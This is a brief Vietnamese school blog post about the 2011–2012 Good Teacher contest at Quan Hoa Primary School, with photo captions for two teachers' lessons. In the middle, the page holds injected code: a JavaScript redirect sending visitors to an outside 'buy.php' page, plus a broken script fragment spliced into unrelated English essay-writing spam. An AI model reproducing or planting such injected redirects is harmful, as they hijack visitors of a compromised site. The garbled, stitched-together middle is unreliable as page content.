Hội thi Giáo viên Giỏi trường Tiểu học Quan Hoa – Năm học: 2011 – 2012

14/10/2011 1:03 Sáng 1 phản hồi

Một số hình ảnh tiết dự thi Giáo viên Giỏi của cô giáo Phan Thúy Lâm:

Một số hình ảnh tiết dự thi Giáo viên Giỏi của cô giáo Bùi Bảo Linh – Lớp 2A:

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) { Their peers from ways to write a good essay other schools in the state also extended their support at american horse through meetings and words of hope

Các phản hồi đã bị đóng lại bở quản trị.